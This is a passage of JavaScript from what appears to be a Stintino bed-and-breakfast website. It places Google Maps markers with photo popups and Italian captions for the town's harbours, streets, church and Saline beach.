      var marker = createMarker(point,"Barche ormeggiate I","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/porticciolo_minore_barche1.jpg' width='300' height='225'><br>Vista panoramica di porto minore con barche ormeggiate</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93630769703204,8.22827160358429);
      var marker = createMarker(point,"Barche ormeggiate II","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/porticciolo_minore_barche2.jpg' width='300' height='225'><br>Altra vista panoramica di porto minore con barche ormeggiate</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93653463593978,8.228824138641357);
      var marker = createMarker(point,"Via Marco Polo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/via_marco_polo.jpg' width='300' height='225'><br>Via Marco Polo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.9361374923396,8.22875440120697);
      var marker = createMarker(point,"Ristorante La Darsena","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/la_darsena0.jpg' width='300' height='225'><br>Ristorante La Darsena</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.936052389828944,8.228813409805297);
      var marker = createMarker(point,"Ristorante La Darsena","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/la_darsena1.jpg' width='300' height='225'><br>Ristorante La Darsena</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.936032127310234,8.229135274887085);
      var marker = createMarker(point,"Segue Lungomare Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/lungomare_colombo4.jpg' width='300' height='225'><br>Segue Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.935768714001554,8.229977488517761);
      var marker = createMarker(point,"Molo su Lung.Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/molo_colombo.jpg' width='300' height='225'><br>Molo su Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);

      var point = new GLatLng(40.93614154483737,8.22999894618988);
      var marker = createMarker(point,"Segue Lungomare Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/lungomare_colombo5.jpg' width='300' height='225'><br>Segue Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93677778390437,8.229854106903076);
      var marker = createMarker(point,"Via Tonnara","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/via_tonnara.jpg' width='300' height='225'><br>Via Tonnara</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93670078714573,8.229972124099731);
      var marker = createMarker(point,"Statua San pietro","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/san_pietro_lontano.jpg' width='300' height='225'><br>Statua di San Pietro</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93670078714573,8.229972124099731);
      var marker = createMarker(point,"Statua San Pietro","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/statua_san_pietro.jpg' width='300' height='225'><br>Statua di San Pietro</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.937016878530144,8.230020403862);
      var marker = createMarker(point,"Lung.Colombo dal mare","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/lungomare_colombo_dal_mare.jpg' width='300' height='225'><br>Lungomare Colombo Visto dal mare</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93705335051565,8.229961395263671);
      var marker = createMarker(point,"Segue Lungomare Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/lungomare_colombo6.jpg' width='300' height='225'><br>Segue Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.937073612721086,8.229725360870361);
      var marker = createMarker(point,"Segue Lungomare Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/lungomare_colombo7.jpg' width='300' height='225'><br>Segue Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93734512567459,8.229457139968872);
      var marker = createMarker(point,"X Lung.Col.-Via Sassari","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/x_via_sassari.jpg' width='300' height='225'><br>Incocio Lung.Col.- Via Sassari</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.937535589319246,8.22925329208374);
      var marker = createMarker(point,"Segue Lungomare Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/lungomare_colombo8.jpg' width='300' height='225'><br>Segue Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93764500435611,8.229060173034668);
      var marker = createMarker(point,"Via Cala Reale","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/via_cala_reale.jpg' width='300' height='225'><br>Via Cala Reale</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93767337118794,8.229387402534484);
      var marker = createMarker(point,"Caletta a Stintino","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/spiaggetta_stintino.jpg' width='300' height='225'><br>Spiaggetta di Stintino all'ingresso di Porto mannu vista da Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93772605241472,8.229194283485412);
      var marker = createMarker(point,"Caletta vista dal mare","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/spiaggetta_stintino_da_mare.jpg' width='300' height='225'><br>Spiaggetta di Stintino all'ingresso di Porto mannu vista dal mare</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.939630653165054,8.230379819869995);
      var marker = createMarker(point,"Zona Tanca Manna","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/tanca_manna_dal_mare.jpg' width='300' height='225'><br>Zona Tanca Manna Vista dal Mare</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93912816808744,8.22878122329712);
      var marker = createMarker(point,"Ingresso Porto mannu dx.","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/ingresso_porto_mannu_dx.jpg' width='300' height='225'><br>Ingresso a Porto mannu Lato destro</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93808266269124,8.229135274887085);
      var marker = createMarker(point,"Ingresso Porto mannu sx.","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/ingresso_porto_mannu_sx.jpg' width='300' height='225'><br>Ingresso a Porto mannu Lato sinistro</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93823665289731,8.228453993797302);
      var marker = createMarker(point,"Rampa di Porto mannu","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/rampa_porto_mannu.jpg' width='300' height='225'><br>Discesa di Porto mannu</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93847574224271,8.228287696838379);
      var marker = createMarker(point,"Distributore a Porto mannu","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/distributore_porto_mannu.jpg' width='300' height='225'><br>Distributore di benzina a Porto mannu</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93848789930493,8.2280033826828);
      var marker = createMarker(point,"Panoramica di Porto mannu","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/panoramica_porto_mannu.jpg' width='300' height='225'><br>Panoramica di Porto mannu</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93845548046733,8.228051662445068);
      var marker = createMarker(point,"Gozzi a Porto mannu","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/gozzi_porto_mannu.jpg' width='300' height='225'><br>Bellissimi gozzi ormeggiati sull'lato destro di Porto mannu</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93867835965457,8.227306008338928);
      var marker = createMarker(point,"Banchina a Porto mannu","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/banchina_porto_mannu.jpg' width='300' height='225'><br>Banchina lato sinistro di Porto mannu</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93865809794135,8.227037787437439);
      var marker = createMarker(point,"Segue Lungomare Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/lungomare_colombo9.jpg' width='300' height='225'><br>Segue Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93847979459702,8.22577714920044);
      var marker = createMarker(point,"Segue Lungomare Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/barche_dx_porto_mannu1.jpg' width='300' height='225'><br>Segue Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93832985732132,8.225471377372741);
      var marker = createMarker(point,"Canale Porto mannu","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/canale_porto_mannu.jpg' width='300' height='225'><br>Canale Porto mannu</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.938139395966836,8.225144147872924);
      var marker = createMarker(point,"Barche lato dx Porto mannu","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/barche_dx_porto_mannu.jpg' width='300' height='225'><br>Porto mannu</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93827717657608,8.224430680274963);
      var marker = createMarker(point,"Stradina caratteristica","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/stradina_caratteristica.jpg' width='300' height='225'><br>Stradina caratteristica</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93837848566423,8.2240229845047);
      var marker = createMarker(point,"Rimessaggio Porto mannu","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/rimessaggio_porto_mannu.jpg' width='300' height='225'><br>Zona rimessaggio barche</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.938127238840444,8.223738670349121);
      var marker = createMarker(point,"Discesa rimessaggio Porto mannu","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/discesa_porto_mannu.jpg' width='300' height='225'><br>Discesa Porto mannu</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.938491951658506,8.223926424980163);
      var marker = createMarker(point,"Fine Porto mannu I","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/fine_porto_mannu.jpg' width='300' height='225'><br>Fine Porto mannu</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93858920806992,8.223819136619567);
      var marker = createMarker(point,"Fine Porto mannu II","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/fine_porto_mannu1.jpg' width='300' height='225'><br>Fine Porto mannu</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93794488167625,8.223931789398193);
      var marker = createMarker(point,"Inizio Via Sassari","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/inizio_via_sassari.jpg' width='300' height='225'><br>Inizio Via Sassari</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93794082928912,8.225648403167724);
      var marker = createMarker(point,"Piazzetta in Via Sassari","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/piazzetta_via_sassari.jpg' width='300' height='225'><br>Scorcio di case in via Sassari</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93772605241472,8.225626945495605);
      var marker = createMarker(point,"Segue Via Sassari","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/via_sassari1.jpg' width='300' height='225'><br>Segue via Sassari</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93777873359951,8.226345777511596);
      var marker = createMarker(point,"Via Lepanto","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/via_lep_ang_via_ss.jpg' width='300' height='225'><br>Via Lepanto</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93779899558246,8.22677493095398);
      var marker = createMarker(point,"Segue Via Sassari","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/via_ss_chiesa.jpg' width='300' height='225'><br>Segue via Sassari</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93758016583763,8.227665424346923);
      var marker = createMarker(point,"Chiesa Imm. Concezione","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/chiesa.jpg' width='300' height='225'><br>Chiesa Immacolata Concezione</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93804619127406,8.228121399879455);
      var marker = createMarker(point,"Tratto Via Asinara","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/tratto_via_asinara.jpg' width='300' height='225'><br>Tratto via Asinara</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93809887220352,8.227804899215698);
      var marker = createMarker(point,"Piazzetta Via Asinara","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/piazzetta_ingresso_via_asinara.jpg' width='300' height='225'><br>Piazzetta via Asinara</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.938147500716504,8.227810263633728);
      var marker = createMarker(point,"Piazzetta Via Asinara","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/piazzetta_via_asinara.jpg' width='300' height='225'><br>Piazzetta via Asinara</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93702093097397,8.225787878036499);
      var marker = createMarker(point,"Piazza dei 45 I","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/piazza_45_1.jpg' width='300' height='225'><br>Piazza Dei 45</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93694798694707,8.225487470626831);
      var marker = createMarker(point,"Piazza dei 45 II","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/piazza_45_2.jpg' width='300' height='225'><br>Piazza Dei 45</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93680209865159,8.22551965713501);
      var marker = createMarker(point,"Piazza dei 45 III","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/piazza_45_3.jpg' width='300' height='225'><br>Piazza Dei 45</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.908988285085194,8.233952522277832);
      var marker = createMarker(point,"Spiaggia saline","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/saline3.jpg' width='300' height='225'><br>Spiaggia saline</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.90697738969352,8.234918117523193);
      var marker = createMarker(point,"Spiaggia saline vista verso Stintino","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/saline1.jpg' width='300' height='225'><br>Spiaggia saline verso Stintino</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.90751255330968,8.235025405883789);
      var marker = createMarker(point,"Spiaggia saline vista verso P.Torres","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/saline2.jpg' width='300' height='225'><br>Spiaggia saline verso P.Torres</div>",bandierina)
      map.addOverlay(marker);
      
      
      document.getElementById("side_bar").innerHTML = side_bar_html;
      
    }

    else {
      alert("Spiacente, ma sembra che il tuo browser non sia compatibile con la Google Map");
    }





